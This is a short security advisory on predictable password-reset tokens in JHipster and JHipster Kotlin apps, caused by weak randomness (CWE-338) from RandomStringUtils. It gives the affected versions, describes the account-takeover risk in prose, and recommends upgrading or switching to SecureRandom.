Name of the Vulnerable Software and Affected Versions:

JHipster versions prior to 6.3.0

JHipster Kotlin versions prior to 1.2.0

Description:

A vulnerability exists due to the use of an insecure source of randomness, specifically apache.commons.lang3 RandomStringUtils, which allows an attacker to compute the value for all other password resets for other accounts, thus enabling privilege escalation or account takeover. This issue affects applications generated by JHipster and JHipster Kotlin. The vulnerability is classified as CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG). There have been proof-of-concept demonstrations of exploiting this vulnerability, including reversing generated random values to predict future values. The potential impact is significant, as an attacker can use a single password reset token to generate all future password reset tokens for a targeted server, allowing them to choose which accounts to take over.

Recommendations:

For JHipster versions prior to 6.3.0, update to version 6.3.0 or later.

For JHipster Kotlin versions prior to 1.2.0, update to version 1.2.0 or later.

As a temporary workaround, consider modifying the `RandomUtil.kt` file to use a secure random number generator, such as `java.security.SecureRandom`, and replace all calls to `RandomStringUtils.randomAlphaNumeric` with the new secure implementation.